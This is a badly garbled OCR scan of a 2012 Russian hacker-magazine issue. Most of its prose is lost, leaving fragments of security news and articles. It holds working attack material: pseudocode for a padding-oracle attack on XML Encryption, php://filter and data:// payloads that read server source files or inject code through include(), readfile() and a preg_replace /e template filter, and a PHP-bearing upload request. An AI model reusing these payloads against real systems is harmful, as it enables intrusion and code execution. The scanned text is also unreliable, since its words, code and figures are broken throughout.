Haker

Fl
01 [156] 2012
ANDROID
:230.
ENCRYPTION

XML-KOHTEHTA
.
,

----
PHONEGAP:

HTML5

(gam]land
hf.fun media
UJ = . - -
-; _ 0
n:1
iiiiiiiiiiiiiiio
-~ - N
-,rp.HEP
.....
~
lntro
nikitozz )) [nikitozfareal.xakep.rul
ctstep (steprareaJ. xakep .ru )
c(gorl (gorlum@real.xakep.ru )
PC_ZONE UNIS
(magglareal.xakep. ru l
. Klouniz (alexanderfareal xakep.rul
MALWARE SYN/ACK
UNIXOID
Step)) [stepffireal.xakep.ru l
cc dushock >> ( adushockfareal.xakep.u )
xakep.ru
ccgol)) ( golumfaeal.xakep.u 1
(pofakumekay.com )
[ g igorievafaglc . ru )
i xafaeal. xakep . ru l
R-
DVD
ant)) ( antfareal.xakep.u l
ccAd ushock andrushockfareal.xake .ru)
01g 1>> levdokimovdsfagmail.com )

Ui-
Security - pae

ART
-
(aliklaglc. rul
: . : .
PUBLISHING
000 , 115280, ,
. , 19, n,
5 , No 21.
.: 1495/935-7034, :
1495/545-0906
no
. :
1495/935-7034, : 1495/545-0906
. , :
n TECHNOLOGY
( f il atovacl glc ru l
100%. ,
(olgae mlfaglc.ru)
250 ,
. ?
, , :
,
. - .
. :

1-3 ,
- . ,
/korenfeldlaglc.rul
: >> ,
. ,
, nn,
,
- .
, .
, : .
,
, , .
n :
/alekhinalaglc.rul
(polikarpova@ glc.rul
( ]
(t a t arekova@g lc .ru l
/gospodinovataglc u l
(dubrovskaya@gjc.ru/
(bulanovalaglc.rul
l koshelevafaglc. u )
llepikova@qlc.ru ]
llukichevafaglc.ru )
V- : claimfaqlc.ru .

n : (4 95)545 -09-06
nn : 1495/663-82-77
: 8-800-200-3-999
:
101000, , , / 652,
115 !
shop.g lc. ru / xake p.
, , -
77-11802
14.02.2002
Zapolex, . 219 833 .
. :
n . , n
, .
nikitozz, rn. .
shop.glc.ru/xakep
vkontakte ru/xakep mag
01/156/201 2
- n.
: co n tentrglc.ru .
000 , , 2012
001

OMOHKASIRI
004
HEADER
004
MEGANEWS
016
017
Proof-of-cocept
011
hacker tweets
-
SS-
Dropbox AdWords
100
COVERSTORY
030
Adobe
COVERSTORY
COVERSTORY
018
L
Encryption
036
PCZONE
UNIXOID
hnG:nL5
102
107
Linux
042
Windows-apoe
tcpdump
Widows-cce
046
112
did-

Widws-?
117
Ubuntu 11.10
Oneiic Ocelot
050
Easy-Hack

054
SYN/ACK
118
060
D5
064
122
- SpyEye
068
Lotus,
072
Lotus Oomio tll
126
X-Tools
130
--
132
MALWARE
080
Wi32/0uqu: Stuxet
084
bootkit test
BitDefede, ESET NOD32, F-Secue, Outpost Secuity,

Risig >>
088
.N-
.NET Famewok
094
098
NAS
5- 6- NS-
Silicon
074
FERRUM
PoweSP060GBSSOV30525
PHREAKING
Loop
, n
n n
136
FAOUNIED
139
142
WWW2
FAQ
8.5
w-
144
2012
NY2k+ 12
EGANEWS
I
<< .
UBUNTU
SIRI

OMOHKASIRI
UBUNTU 06
n n
iPhone 45
Applidium
111
~.)
'.1
" On 19 rem1n d me
l's dad's b<rlhday "
'~ ~:J' r1
1'3 -cL 1
,(!
rJer '::,r
111
5ii,
i05 5.
n ,
n
. ,

19
Saturday
2012
n 5ii n
. -,
Oad's brrthclay
Andoid,
n 5ii
r;
~ ''1'
iPad.
Applidium: appl idium .com/en/news/
"
cack i ng si i .
:
iPhone 45
Canonical,
Debian,
Ubuntul , Ubuntu
n -
, n .
5. n 5ii
n , R- .
, n n
no
iPhone 45 .
Canonical ,
Windows 8, n
n\n,
. n,
. ,
. ,
Applidium
n ,
<< BCKpTA Siri .

,
n
,

Sii
.
n, .

>>.
iPhone
Apple . n,
Ubuntu 14.04, 2014 . n,
, n
n << n>>.
Canonical n
Ubuntu 12.04, n n
2012 . , L5-
[ n),
Windowsxp
WINDOWSXPCTAJIAKCO
APPLE
(CHRONOPAYI
, STEAM .
I .
. ,
! -
comScoe,
, -
, n
DDOS-ATAKY (Assist),
50,81
<<>>.
Steam.
001,
01/156/2012
ltel 11 11 -11 11 11 11
, .
ltel 2011 . . ltel, ltel, ltel . .
* .
MEGANEWS
& F , 600 .
POLAROID
DNS
, DNS-apeco.
, ,
-
n.
DNS -
2008 n
Polaoid
,
w
11-
Hotmail, Gmail, Google, Microsoft

, Uol, Terra Globo.
, , , google .com ,
I- Google,
-. n
. n,
Google n
n Google Defender, n
.
, ,
27-
Polaoid
n
n ,
, 11-
n DNS-cepepax
n n
, DNS-.
, , n
Ghost Click .
Polaroid
Z340
ZINK
lnstant Digital Camera.

Zero lnk Printing, n
, n
DNS Changer.
OS
DNS.
I- n 15
Windowsoep

n . ,
! ,
n >> , .
, n .
n ,
. , , n
,nn
n .
n .
2, 7"
14 Mn.
100
, n
500
[ n], n
SD .
I 43 ] F/3,2.
[ -1280 720 n ]. Polaroid Z340 n
76 102 , $20 30
<<
. - ,
no
25 n.
14
, << n n
. - [ - ]
,
, DNS-cepepa
Polaroid. Z340 lnstant Digital Camera $300.
ln ternet Systems Consortium .
Rove Digital.
- , n .

, .
- ,
, .
AVIRA

AESCRIPT.DLL

006
EstDomains-oeoro ,
nn , .

2008, n
ICANN
n .
n

22
85 r~ .
01 /156/2 01 2
MEGANEWS
, CONSUMERIST, RIAA .
, WI-FI,

.

,

1.6.4.
. ,
, .
,
,
.
, ,
,
.
CMS,
, .

, , ,
. ,
6 ,
1.6.4,
, ,
. -, ,
10 ,
/GS. ,
, , ,
, 802.11 .
-,
. , ,
iPhone45,
[ 100 ),
802 .1 1, .
, .

, ,
[CDN) .
Apple n
- :).
.
, - ,
- .
,0-'--~
- - - -
., ,_",,.,,..
- " _ ,._""_, ___ - - ,.

.... ......
. , - ,
. ,_,.
__
(<~
....... , ... , ..
'<I';J
..~.....,<Jo
"' I" O.""*'nr l """ "' '" ''' '"""" "'
--~ ' """"" " L>oo< , "' - ! r.=oo _ _ ,,... ..
1 . ,.... .
WEXLER.BOOK 7001. Wexler

WLR. 7001 7.0"
,
Jj
._d
.....
008
Firefox with Bing

ing
. 4
( 32
microSDI ,
, ;
~
KaneOIAII~
F. -
<< ,
GGL!~~ -,
lterfilm.ru
1500 mAh, ,
Big
WEXLER.BOOK 7001
Microsoft.
Puzkarapuz.ru .

: 5 990 .
Firefox.
01 / 156/201 2
t'
' !..'
' ..;;.
'
<~ t19.
.f
~~
~-
. , ....... - . ...
- - . .l . ~;
.,
'
'
1.
1.
. U> -z... \--.:,,,.
j ll_ ~:-~<. 1 .
~< , 50%
: : r.- (495)-663-82-771 shop.glc.ru
MEGANEWS
ENTENSYS COMMTOUCH , 6, 7% n .
,
>>
.
YouTub e
:
Aoymous
[Zetasl

. , >> ,
, >> ,
. ,
26 2011
- . ,
- .
-.
Anonymous
- ,
. ,
,
, -
>>
, ,
. , OpCatel [n
~. ,
, ,
,
.
, , -
OpCatel .
.
.
, ,
, , .
Lolita City - ,
100 .
F e edom Hosting,
Anonymous n
>>. Opeat io n Daknet
.onion- Hidden Wiki,
. ,
S- .
,
Lol ita City

. n
2000-6000
.
. -
SQL- .
, , ~
Feedom
Hosting . ...
: F eedom Hosting,
40 ,
38
n:
pastebin . com/1 LH nz EW.
<<IT
.

,

>>
010
01 / 156/2012
laEdiStrosar:
laiLLUMINATI:
laRuCTFE:
>> [
OldEuOpe
#RuCTFE
RWTH, ,
t.co/IUII94Ko .
l.
1!!!1 :
lilil CTF
ciWeldPond:
cljkouns:

. Ggl--
Google,
OllyDbg
_noRE.exe
IDA
ciStephenwest:
1!!!1
lilil

I-: http:!/4 ..2;

http:/196.4; ht.p://71.3;
ht.~ .
-. :1
, Google
Wi-Fi,
_nomap. :1
...
clinsitOr:

ciRogunix:
DS/-
ICMP efCount
TCP/IP [MS11-083I 232
UD-, , 250
Oday BIND.
4. lf
How to do pentest:
1. Daw line with .
2. Check line.
3. lf visie, woks .
line, does not wok .
1!!!1 :
lilil - .
pentest?
1. [) .
2. .
3. , ,
4. , ,
.
.

DNS- cepepa
BIND,
DoS Oday.
52.
t.co/aY.PCMyRy.
lafjserna:

Micosoft/MSRC .
!

Google.
Shodan
++.
Siemens Simatic.
t.J;o 1l1Q0b3cq .
cljduck1337:
1!!!1 :
lilil . SCADA-
: bash: ./:-
. S-
- .
1!!!1 :
lilil -
,
,
. !
cljOOru:

clmikko:
-
Windows [NT/2000/
XP/2003Nista/2008/7/81.
: .. _o/oBiJ;17 .Q .
: << .
#wostpasswod
1!!!1
lilil
. ?
01/156/2012
:1
011
( 926 ), ,
MEGANEWS

Nito,
lociJtionofinfected computer s
tioUIIpi8CIIIftlleM
, n
? ,
, .
n ,
.
PC.WNieO.US,...IJ
.,_ICWIIIcll'rlllf.
~llwpop~
- VideoGhost,
WUII~4if ... tflt.tllilo

-!I\IC11WiW
.-,.un
. ,
, .
ol~oi!Wpail~
IO'f2~htountry
,...,.
loulwdCIidlotor&D
fiOclns' l'lt.........IOif
,_,.,otortcrn-
, [
-- 2 ] .
VideoGhost
,
US-. US-
n - ,
.
US-,

Stuxnet, , -
n , n .
cVideoGhost .
VGA, DVI DMI,
$200.

, ,

Symantec. ,
Nito,
n ,
29 19 ,
[,
]. n ,

n. -
,
Poisonlvy].
, .
Symantec ,
. Nito :
, .
&
& BSUP a
GGL,
FACEBOOK.
&
Tusted Fiends
Andoid ,
ICANN
<<.
no nn
012
18,7%,
Mini,
13,1%.
01 /156/2012
MAIL.RU GRU , Twitter. , .
HAANDROID'E
BITCOIN
BITCOIN
BitCoin
n .
,
, . ,
n
Mt Gox,
BitCoin,
, . , BitCoin
FXI ,
The Cotton
Candy
$200,
n

2012 .
,
cWindows 8
.
, ,
, n
.
lntego,
Devii Robber,
BitCoin .
.
,
, ,
, ,
Bi tCoin,
DeviiRobber
05 ,
n
.
The Pirate . ,
Graphic Converter 05 .

FXI
The Cotton Candy
[ - << >> ,
n
,
. ,
Devii Rob ber
21 , , ! .
itin - ,
U5-,
. R-
5am sung Exynos 1,2 [
, 5amsung Gala xy 5111.

Mal i-400 , micro5D [ 64 I ,
Bluetooth, HDMI2 .1
Firefox,
5afari
Vidalia-
TOR.
U5B 2.0. ,
n 1. h Cotton Cand y
Android 2.3.
, D evii Robb e roapye
, , ,
Wi-Fi
. De vii R obberae ,

Android.
, ,
BitCoin
Oper
HDMI, U5B [ n
!. Bluetooth ,
Microso ft n ,
. ,
Android
Market,
BitCoin.
: 1 n
2, ,
50 , 1
, GOOGLE ?

, n ,
.
,
SSID
, n ,

Bi tCoi n. -
n
,
<<_NOMAP>>,
GOOGLE
n , ,
01 / 156/2012
, .
, .
BitCoin, :
- >>.
013
MEGANEWS
LINUX3.1, kl . g .
CTAHAADOBE
FLEX
FLASH
,
,
, , n .

, , , n
.
iSpy n
100%.
, , n

iPhone ndid
[magnified keysl. iSpy n

n, n,
n n
- !
,
.
n ,

d Flash n

60
n ,
90% .
. n n
n . n , ,
750
( 7
n n .
% n!

n DSLR-aep n n
n .
12 . iSpy
magnifi ed key n -
dobe n n n
Fla sh l . Fla sh
n n
, n n
Adobe Al R
n n.nn
Android
PlayBook, n
Flash Player
n .
n n
n
HTML5. n
n , n
n
Apple,
Flash . , , n
, n-n
Flash Pl ayer iOS.

Fla sh Pla ye r n Apple iOS
,- n . Adobe Fl ash
n - >> Apple.
, n
Flex SDK. Flex 4.6 SDK,

29 , n n source.
AMAZON
GGL
Shdd Challenge
, 2012
, .
47
DARPA
50 .
011.
42
01/156/20 12
500 Wikimedia.
IPHONE
~~>>
iPhone Dev-Team
n
. ",--"
iPhone4S.

.

n,
,
.
iPhone 45

. Chonic

DevTeam iPhone
. , , ,

iPhone,
& , .
, , ,
, iPhoe
:
45, iPhoe
iPhone 4 iPhone 3G5,
. ,
,
>> . , ,
. :
51 -
& , ,
,
. &
! >>, >>,
, l.
, -
youtu.be/gofpeiTXI5U. :
&
space
1611)
<< >>;
51 - &
T-Mobile;
, Wi-Fi !
<< >>,
<< >>;
);
<< >>,
<< >>;
iPhoe ;
<< >>;
EDGE
51 -,
51 - T-Moile
. ,
<<
20-30 ;
iPhoe,
>> iPhoe T-Moile,
<< >>;
MCAFEE:

75

01 / 156/2012
015
.HEADER
Proof-of-Concept
SS-
100
, .
, SQL-,
, ,
. , ,-
map,
sql-
SQLi
. ,
SS- . - .
Damn Small XSS Scanne [DSXS).
XSS
. Coss-site scipting
SS- -
[XSS]-
n.
GET-
S-
SS-,
n , n
n- n , n
n JS-.
-n
Scanne
Damn Small XSS

[DSXS]
n .
-, .
SS- n
n L-
n GET/POST-anpoca .
- , ,
n, n
[
] ,
-.
n .
n- n.
n n
n,
< hef= " ... ">, ,
> -
SS-.
SS-n. ,
-n
n . n ,
DS XS
. ,
. -
. n,
n,
L- <scipt> .. </scipt> [ n
] ,
n JavaScipt-o. ,
n, n
n n],
L- < hef= " ... ">,
DSXS
n [
. ,
> n n JS-,
<scipt> ...</scipt>.
n. , ,
n n
n XSS
zero.webappsecurity.com
016
DSXS
Use-Agent, Rf
, n SS
n GitHub [https:Ugithub.com/
stampam/DSXS ]. ::
? n
Python,
Cookie
- .
01 / 156/ 201 2
HEADER
10 DROPBOX
ADWORDS
10
[ ] :
, , ,
1. << >>.
2. [, D].
3. ,
50
. -
$99,00 . ,
[, , ,
, ].
3.
>> : ,
600
250 . ,
1 , ,
- . ,
.
>> ,
, D,
-.
: d, f oline stoage,
f,
online backup
, - ,
, D -
- , ,
URL
online backup, online backup data,
, ,
[, it . ly/ud69i ]. ,
Google.
space.
. ,
D Refeall Status [,
httR:Udb.tt/UfxuFBm ]. , .
10
, D
. AdWods !
,
, .
,
. ,
[Cost-Pe-Ciick].
[ it.ly/xNKyB ].
. -
D- .
, ,
, .
? , ,
? - ,
. - . ,
D. -, .
:]
AdWods,
-, AdWods, , ,
?,,- . ,
Google]. . :] :::
! ,

Google,
1000
. .
Qit.
l y/AEsg1 $75
AdWods, ,
.: ] ,
e-mail [
- ], [
-
about.me], .
e-mail.
Updated
Statu.s
3/ 26/ 2011 7:4 5
,.
3/26/ 2011 6: 52
3/ 26/ 2011 6:37
Jo ined
Completed
Jo ined
3/ 26/2011 6 :08
Jo ined
3/ 26/2011 5:23
Completed
3/26/ 2011 5:14
Completed
Google AdWods [ adwods.google.com ].
3/ 26/2011 4:49
Completed
3/ 26/2011 4:32
Compl eted
[ ] .
?
? , ,-
-7
>> .
[ ,
, ],
01/156/2012
- 250 Dropbox
017
COVERSTORY
lplaintextl llirstfaplaintext .su, www.plaintext.sul
BEAST Padding Oracle Attack

.NET Framework,

Encryption,
XML
L-.

XML ENCRYPTION
www.w.org/TR/
mln-r/
Framewok "ax [ n
XML Encryption

w .
bit l/u
r
XML
Encryption.
XML Encryption,
2002
XML
.NET, Apache Axis2,
JBOSS . .[.
-
n,
Microsoft
Encyptio n n
XML
Red Hat.
,
L- ,- ,
L--
. n
, n
nn , - CBCI.
018
, n
AES
DES . n
AES [
01/156/2012
ISJ*iiirIId
, n
XM L En cypt ion
16 , 128 !
. ,
,
.
n ~ .

IIVI,

XOR,
.

,

IV1[0]
//
AES_ENC(k, IV xor [ 0 ]);

AES_ENC(k, C[i- 1] xor M[i]);
[0]
C[ i]
//
[ 0 ]
M[i]
AES_DEC(k , [~) xor IV;

AES_DEC(k, C[i] ) xor C[i- 1] ;
k-
, - , - ,
IV-
ll.
Attack.
BEAST
P addig
. .
, , :
XOR
IV
MSK, IIV MSK, C[DJI

[) MSK. ,
. ,
12
Dx05. ! 16 !,
, 15
MSK,
, 16- 10.
. ,
XM L En cyptio.
XML
En cyptio
, .
, , ,
ASC II .
ASCI I
, NULL ! Al,
! Bl. ,
, ,
>>. ,
, n
. ,

,
16
tue, [) =
AES_DEC _
CBC[k, IIV, C[OJII NULL, false -
.
, ,
.
:
1.
IV1,
[I V1, C[O] I .

niV,
lniV, C[O]I . tu,
false .

! !
01/156/2012
IV1
= iV,
019
COVERSTORY
WS-SECURITY
WS-Security -
SOAP, _
-. WS-Secuity XML Encyption XML
Signatue.
2-3 ,
, ,
2.
. [] ,
! .
[0].
XOR []
IV.
[, AES_DEC ,
msk =
repeat
XML
XML ENCRYPTION
Extesie Makup Laguage [
msk++
IV2 = IVl xor ( . .. e llmsklle ... )
11 msk j -
XM LI
XML
, < >
[odel.
until Server((IV2,
[ ] ))
==
, ,
true
11
"
[
, . .l
Iput:
XML.
Output:
j-
< >
&
& >>.
XML ti.
W XML Sigatue W
XML ti, XM L
[]),
s-
XML
C=(IVl,
XML
X[j] = ASCIICode(NULL) xor IV2[j]
retur
X[j]
= AES_D EC(k, [])
XML
ti,
. ,
[ , , . . l .
. j-
, ,
j-
<CipheValue>, ,
, .

. , ? : .
<EcyptedData>.
!:
,
,
AES_DEC_CBC(k, (IV2,
IV2 xo r [].
[]))
IV2 xor AES_DEC( k,
[])
. <CipheValue>
<?xml version= ' 1.0 ' encoding= ' utf-8 ' ?>
<Enc r yptedData Type = ' http://www.w.org/2001/04/xmlEnc#Element ' xm lns = ' http://www.w.org/2001/04/xmlEnc ' >
<Enc r yptionMethod Algorithm = ' http://~~.w3.org/2001/04/xmlenc#aes128-cbc ' >
</ Enc r yptionMethod >
<Keyinf o xm lns = ' http://www.w.org/2000/09/xmldsig# ' >
<KeyName >Jo hn Smith</ KeyName >
</ Keyinf o >l
<Cipher Data >
<Ciphe r Value >A123456 ... </CipherValue >
</Ciphe r Data >
</ Enc r yptedData >
020
XML Encryption
01 / 156/ 2012
XM L
E ncyption
n n ,
<EncyptionMethod>.
n n n,
n L- .

, L-,
. ?:-]

XM L ti
v Secuity,

n n
. ,
L- !
XML], n
. n
. . ,
n <EncyptedData>. n td
!, , -,
Element -
, L-
, . ).
. Encypted
-,
Content
, .
, . . n Encypted
,- -.
Text
Contet,
n Encypted Contet,
Paddig
l-,
. , n n
Oracle Attack,
Axis2,
ASP.NET),
.net.
. , n
XM L Famewok'o
n .

- .

UTF-8,
XM L E cyption
n n
, .

,
S-.
, n
XML
. n
Receive,
UTF-8-
, ,
lline feed ]
lcaiage tu]. , n
ASCII
Dispatch . Message
message flow
SOAP n ,
UTF-8.
n,
ASCII
128
Axis2 . :-]
! 4]. ,
,
AXIS2
- ,
Axis2.
,
tue
n n
-. nn
secuity
Apache Axis2
Famewok,
Rampat WS-Secu ity.

n
Signatue
XML
Encyption
false
. n
1.
fault.
secuity
fault
XML
. , ,
SOAP.
Axis2
Famewok, n
? , n
001
lmessage flow]. lmessage flow]-
S- ! ],
OxlO,
n n
n ,
2.
n n. S-
n, n
n>> ,
Message
Receive, , ,
Sevice n .
, D - , ].

: st, Secuity
Axis2
Dispatch . Secuity,
ASCII Oxl F ! 09,
- L-
, &
IOx26] < >> > .

XM L SIGNATURE
n ,
XML Signature -
n W.
ASCII !
]. n n
n >> <<& >> < >>,
n n n
XML
01/156/20 12
XML.
021
COVERSTORY
. ,
, , ,
, 16-
, tue
false.
, <<> S
, . ,
tue, SOAP(AES_ENC_CBC[k, [IV, CIJI

secuity
fault, false .
fault ,
, secuity
, L- :
PAD(M) ;; (IV xor AES_DEC(k,
10
Handlers (intercepters)
))
, L-<>,
Message flow Apache Axis2
</>.
2
<<&>>,
<<&gt.
. [FindiVI
. ; [IV, [1], ... , C[d]l
s-,
i, << >>
(;[iv, C[i]l.
secuity
fault,

, ,
, .
[FindXbytel <<n
>> [
FindiVI j- X[i][j]
X[i]; AES_DEC[k, C[i]l. ,
.
.
.
C;[IV, [1], ... , C[d]l,
Input: (;([ 0 ] ; IV,

Output: ;([ 1 ),
[ 1 ),
'
C[d))
M[d))
.
,
C[i] C[i-1].
,
for i ; 1 to d do
iv ; FindiV(C, i)
for j ; 1 to 16
ASCII [
UTF-81. ,
X[i)[j) ; FindXbyte(C[i), iv, j)

end for
X[i]
(X[i)[ 1 ), ' X[i)[ 16 ))
M[i] ; X[i] xor C[i- 1]
, n
,
Dx01 [
!.
end for
return ([ 1 ],
'
M[d))
.
,
[ ,
! .
:
--
FINDIV FINDXBYTE
FindiV n
, , ,
W n web-sevice n ,
n n n
FindiV FindXbyte .
machine-
- .
to-machine-a . n n
n - n
, , ,
. n
, ,
WSDL !Web Sevices Desciption Languagel, XML. -
: <
, nn n
01 .
RPC IRemote du calls,
IV,
!,
SOA !Sevice-oiented achitectue,

- ! REST [Repesentational state tans
- , , ,
fel. n
n n
, , <<
GET, POST, PUT, DELETE
n , n .
022
. . n
FindXbyte. n ,
f-3 .
01 /156/2012
Dec.
Char .
Block
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
NUL
SOH
STX
ENQ
07
08
09
BEL
BS
LF
VT
FF
CR
OD
so
OF
SI
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
20
21
22
23
24
25
26
27
28
29
2
2
10
11
12
13
14
15
16
17
18
19
DLE
DC1
DC2
DC4
NAK
SYN
CAN
su
ESC
FS
GS
RS
1D
1
us
1F
Dec.
"
&
'
(
)
-'
2D
2F
1
Block 3
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
1
2
3
4
5
7
8
9
:
;
<
3D
>
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
40
41
42
43
44
45
46
47
48
49
Dec.
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
F
G
4D
4F
50
51
52
53
54
55
56
57
58
59
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
Q
R
5D
5F
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
Char.
60
61
62
63
64
65
66
67
68
69
Encyption
'
i
j
k
6D
m
n
Block 7
lock
Block 5
30
31
32
33
34
35
36
37
38
39
Char.
lock
SPC
Block 1
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
Char.
Block 2
00
01
02
03
04
05
Dec.
XML
70
71
72
73
74
75
76
77
1
}
78
79
7F
DEL
7D
ASCII
. - , n
-, -, n
[ ,
. n
-, ,
[ ]. , ,
XML 5chem'
n. ,
, ,-
[L-]
, ,
. , ,
[, 150/IEC
n
, , ,
19772:2009],
051 [n
, XML Encyption 55L/TL5,
n 5] .
. ,
,
XML
Encyption . , ,
[ . ],
u .

,
,
n , n n
n . ,
XML
5ignatue.
, n
XML
5ignatue
Wappig, , n
XML
epic fail .
Encyption
side-channel,
, -
, n . n
nn / .
Juaj 5omoovsky i Jage,
n- ,
, n n
n n .
. ::
01/156/2012
023
PrOxor [php.m4sqllagmail.com, rdot.org/foruml
$ FILES
,

'-"

il . ly/sfDcys
noce
L ightig
,
,
Template.
4.3
. [
blt.ly/ttvWV -
, . . l <<
LightningTemplate.
it.!y/mdrdqf
ca,

File path
injection.
pastebln.com/1edSuSVN
- n
>> .
.
,
, .
,
:
print _r(st r eam_get _fi lters());
File path
injection.
. steam _ filter_ append/
it . ly/g6ztD -
$_FILES.
':,~qt\0~
-____... ,.
contents
fopen,
......,.., .L.oc...... ",....,__Pif'
~~
file_get_
. .. ....
.....__llriWolo,..,
1....... - .
. .
lt II PHDOd( ' lllrJWII ' ) I
,..
'.. t-l&tO ftiH~ t ... t
- tM kLU I ~>laLO""
-I. ,koll -~-" . -l" or t llo """'""' ""-1

: r_t...., ...,..
" ot coo Lol lotpor.,. ...,.. N-l td tM-
--.1-.....
n.
~ r .,...
'!"lt1
tA8'p tr.., tor 'Dltto -L< -
<~
t - L rLI (r.-o. .u
8~LIUI
' I - - - 1 8UI--Oil
cL-
: , -~lojlaiJ
IIIp_t_I...., _II i r c tlld.o ..._...,r_Hiter

n .
01 / 156/2012
steam_filte_pepend n n php://f ilte.

, ,
.
:
$fp = fopen( 'php :// output ' ,

stream_filter_append($fp,
i f ($closi ng) {
$consumed += strlen($this->_data);
$str = nl2br($this->_data);
$this->bucket->data = $str;
$this->bucket->datalen = strlen($this->_data);
' w' );
'convert . quoted-printae-encode ' );
fwrite($fp, "I \ v Love \ v PHP .\n" );

,
POST, Base64 :
readfile( "php: //filter / read=convert . base64-encode/

resource=php: // input" );
Secure [9ist.github.com/600388/cd99ae03c3
<head>
<meta cha~set= "utf-8" />
<tit1e>{{ tit1e }}</ tit1e>
</head>
<bodY>
<h1>{{ tit1e }}</h1>
< > 11 {{ name }} </ >
1
< > {{
meagelafe
}} < / >
< h2 > Iteiil </ h2 >
<u1>
{% fo~ ite!il in ite!il %}
{% i f ite!il %}
<1i>{{ ite!il }}</1i>
{% endif %}
{% endfo~ %}
</u1>
</bodY>
</htm1>
, .
, ft-,
gz-,
:
co py( 'compress.zlib: // ftp:/ / user:pass@ftpho st.com : 21/

path / file. dat. gz' , '/local / / of / file . dat' ) ;
php:// filte
- . ,
include ($_POST[ 'inc ' ]) ;
sample.php #
allow_ ul_ic l ude

= Off >>
RFI.
< ?php
require_once
'Lightninqemp1ate.php' ;
--
S- :
~ite!ils
= array(
'hoge' , null, '<b>fuga</b>' ,

inc=php://filter/read%3Dconvert.base64-encode/resource%3D/
path/script.php

,
-
. !
lG
'piyo' ,
) ;
$1t = new Lightninqemp1ate( '8Iilp1e . htm1'

$1t->tit1e = 'Samp1e Temp1ate' ;
$1t->n8Ule = 'Yo~1d' ;
$1t->Iilessage = '<b>hi'</b>' ;
$1t->ite!ils = $items ;
);
echo $lt ;
, , ,
. -
sarnp le_ca che.php #
. ,
12.
< ?php
. ,
require_once
filte !
] .
, .
te!ils = array (
'hoge' , null, '<b>fuga</b>' ,
$1t = new
private $_data;
, $closing
TRUE. :
01/156/2012
'piyo' ,
);
$this-> _data >> :
while ($bucket = stream_bucket_make_writeae($in))

$this- >_data .= $bucket->data;
$this->bucket = $bucket;
$consumed = ;
}
'Lightninqeiilp1ate . php' ;
Lightninqemp1ate(
'amp1e.htm1' ,
1
1
new
Lightninqeiilp1ateCache_Fi1e( '. /cache' )
);
$1t->title = ' Samp1e Te!ilp1ate' ;

$lt->n8Iile = 'Yo~1d' ;
$1t ->meage = '<b>hi!</b>' ;
$1t- >items = $ite!ils ;
n
Lightning Template
025
COVERSTORY
if ( !empty ($t his->bucket - >data))
stream_bucket_a ppend($out, $th is->bucket);
return PSFS_PASS_ON;
}
,
PSFS_PASS_ON.
include ( "./LightningTemplate.php" );
$lt = new Light ni ngTemplate(' . / sample.html' );
$lt->title = ' Title' ;
echo $l t;
L-:
. .
:
stream_fi lte r_register( 'convert.nlZbr_string ' ,

'nlzbr_filter' );
<html >< head>

<meta charset= "utf-8" />
<title>My Title</title>
</head></html>
,
L- . ,

include,
, ,
- ,
, .
. ,
Google Code
Seach.
steam_filte_egiste.
L-. :
Lighting-Temp l ate !
!, . ,

sample.html:
function fi l ter($i n, $o ut , &$cons umed, $clos i ng)

while ($bucket = stream_b u cket_ma ke_wri t eae($in))
$patterns = array (
puic
'1\{%\s+if\s+(.+?)\s+%\}/e' ,
<html><t:Lead>
<met a charset= "utf-8" />
<t itle>{{ tit l e }}</t it l e>
</ head> </html >
);
$replacements = array (
'"<? php i f ('. \$this->condition($1). '): ?>'" ,
2
3
4
5
class nl 2 b_fi ~e extends _Use_F i ~e {

private $_data ;
/* n t
function onC eate ( )
9
1
11
12
13
14
15
16
17
18
19
20
21
$this-> _data = ";

eturn true;
7
8
. , ,
}
/* n /
g_l
puiic
. ,
function
fi~er($ i n ,
$out , &$consumed, $closing)
{
/*
.,
while($bucket =steam_bucket_make_writeae ($ i n))
{
$this-> data .=$bucket->dala;
$this->bucket = $bucket ;
$consumed = ;
/*
( ukt).
.,
if($closing)
{
$consumed
$st
+= stlen($this-> _data);
= nl 2 b( $bucket-> _data};
if(!empty($this->bucket->data))
steam_bucket_append($out ,
PSFS_PASS_ON;
{% if print_r (i ni_get _a ll ()) %}

- -. ,
,
. , :
include ( " . / MYLightningTemplate.php" );

$f = $_POST( "file "];
readfile ($f);
, .

$this->bucket->data =$st;
$this->bucket->datalen = stlen ($this -> _data);
etum
'$_data'
026
'"<?php if,
. ,
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
);
$bucket->data = preg_replace($patterns,
$replacements, $b ucket->dat a) ;
$this->bucket);
S-
file :
file= ph p://filt e r /rea d%3dconvert.light ni ng_temp l ate_fil ter/

reso urce%3d
data://tex t / pl ai n % bb ase4, e yUg a WYgcHJpbn R f cih p b mlfZ2V0X2
Fs bCgpKSAlfQ
,
,
, ,
01 / 156/ 2012
-----------------2421143186617
S- :
----------------------------- 2421143186617
-
php_use_filte.
: filte, t, oCiose.
Content-Disposition: form - data; name= "uploadfile" ;

filename= "hello . txt"
Content-Type: text/plain
filte, :
1.
$i - , ,
<< , .
2. $ut- , ,
<?php
echo ' Hello!! ! ' ; ?>
----------------------------- 2421143186617 --
3. $cosumed- , ,
4.
, .
hello.txt, < ?php echo
$closig- , ,
- ,
'Hello! !! ' ; ?>.
TRUE,
phpseUm44, hello.txt.
,
filte
).
1. SFS_SS_N-
$_FILES :
2. SFS _ FD _ - ,
$out .
3. PSFS_ ERR_FATAL ldefault) - pooa .
[t/is ,
. !,
), t,
Array (
[uploadfile] => Array (
[name] => hello.txt
[type] => text/plain
[tmp_ name] => /tmp/phpseUm44
[error] =>
[size] => 33
. t

FALSE
TRUE . o[lose
! ).
,
steam _fil te_egiste.
, $_FILES[uploadfile][type]
Cotent-Type, .

, -,

, :
. , ,
.
$_FILES[ " file " ][ "type " ] == " image/ gif"
tl
move_uploaded_file, .
getimagesizel). , ,
, , . .
, IF-
, .
- . ,
. , -
, ,
pic.php.myext -.
, -
,
L-, :
,
.
, $_FILES.
<form actio=upload.p h p method=post

ectype=multipart/form - da t a>
<input type=file name= uploadfi le>

<input type=submit value =Upload>
</form>

, ,-
.
bugs . php.et ,
, - .
:) ,
Upload, S
/ ,
, Cotent-Type
$_ FILES [ uploadfile]
[name] . ,
,
Content-Type : multipart/form-data; boundary=
01 /156/2012
